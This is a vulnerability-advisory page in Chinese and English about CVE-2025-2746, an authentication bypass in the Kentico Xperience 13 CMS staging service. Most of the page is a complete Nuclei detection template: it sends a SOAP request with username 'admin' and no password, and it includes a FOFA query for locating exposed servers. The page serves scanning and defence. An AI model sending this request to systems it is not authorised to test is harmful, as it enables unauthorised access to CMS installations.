CVE-2025-2746: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)

日期: 2025-08-01 | 影响软件: Kentico Xperience CMS | POC: 已公开

漏洞描述

Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)

PoC代码[已公开]

id: CVE-2025-2746

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
  author: DhiyaneshDK
  severity: critical
  description: |
    Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
    - https://devnet.kentico.com/download/hotfixes
    - https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2746
    cwe-id: CWE-287
    epss-score: 0.8756
    epss-percentile: 0.99553
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData

        <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Header>
                    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                        <wsse:UsernameToken>
                            <wsse:Username>admin</wsse:Username>
                        </wsse:UsernameToken>
                    </wsse:Security>
                </soap:Header>
                <soap:Body>
                    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
                        <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
                    </ProcessSynchronizationTaskData>
                </soap:Body>
            </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4a0a0047304502202bbe76572f6c91fac37e669efc03bdfa1d4d83993a2e539404ce6682f878dd61022100f2dd1fe7a144e999b2c94946a958fcda9a93325f539586af8f843f42316efd5a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-2746.yaml

相关漏洞推荐